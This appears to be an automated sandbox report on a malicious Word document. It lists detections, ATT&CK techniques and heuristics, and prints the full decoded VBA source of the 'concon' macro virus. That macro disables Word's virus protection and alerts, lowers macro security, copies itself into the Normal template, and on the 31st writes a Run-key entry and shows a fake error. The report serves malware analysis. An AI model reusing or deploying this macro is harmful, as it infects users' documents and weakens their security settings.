Verdict: MALICIOUS
Risk Score: 200

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The sample is a Word document containing a VBA macro with an AutoClose subroutine. The macro attempts to export its own module to disk and import that exported copy into the Normal template, indicating an attempt to establish persistence. It also attempts to write the value 'c:\con\con' to the registry Run key, likely to execute a second-stage payload.
Heuristics (4)

- ClamAV: Win.Trojan.Psycho-3 (severity: critical; rule: CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Psycho-3
- VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS): Document contains VBA macro code
- Auto_Close macro (severity: high; rule: OLE_VBA_AUTOCLOSE): Auto_Close macro
- Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1966 bytes |

SHA-256: 43d230fe7d1be1336a058c5ef266bbf663c501476efa76ca1133c9ef01a04c27
Detection (ClamAV): Doc.Trojan.Concon-2
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "concon"
Sub AutoClose()
On Error Resume Next
Dim FY, SNP
FY = (Rnd * 0)
SNP = (Rnd * 0)
Options.VirusProtection = FY
Options.SaveNormalPrompt = SNP
Application.EnableCancelKey = wCancelDisabled
Application.DisplayStatusBar = (Rnd * 0)
Application.ScreenUpdating = (Rnd * 0)
Application.DisplayAlerts = wdAlertsNone
CommandBars("Tools").Controls("Macro").Delete
Const Exportf = "c:\boot.386"
Const Ego = "concon"
Set ADoc = ActiveDocument.VBProject.VBComponents
Set NTmp = NormalTemplate.VBProject.VBComponents
ADoc(Ego).Export Exportf
NTmp(Ego).Export Exportf
For I = 1 To NTmp.Count
If NTmp(I).Name = Ego Then NtmpOK = True
Next I
For I = 1 To ADoc.Count
If ADoc(I).Name = Ego Then DocOK = True
Next I
If DocOK = True And NtmpOK = False Then Set Stoj = NormalTemplate.VBProject _
Else: If DocOK = False And NtmpOK = True Then Set Stoj = ActiveDocument.VBProject
Stoj.VBComponents.Import Exportf
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
Call Pay
End Sub
Sub Pay()
Dim Xday, Strn
Xday = Date
Strn = Format(Xday, "d")
If Strn = 31 Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "") = "c:\con\con"
Dim Msg, Style, Title, Response
Msg = "Shutdown all applications and reboot"
Style = vbOK + vbCritical + vbSystemModal
Title = "Error"
Response = MsgBox(Msg, Style, Title)
End If
' (c) Pvx 2000 only for research purposes
' concon exploit virus (word97/2000 compatible) dont distribute
End Sub
```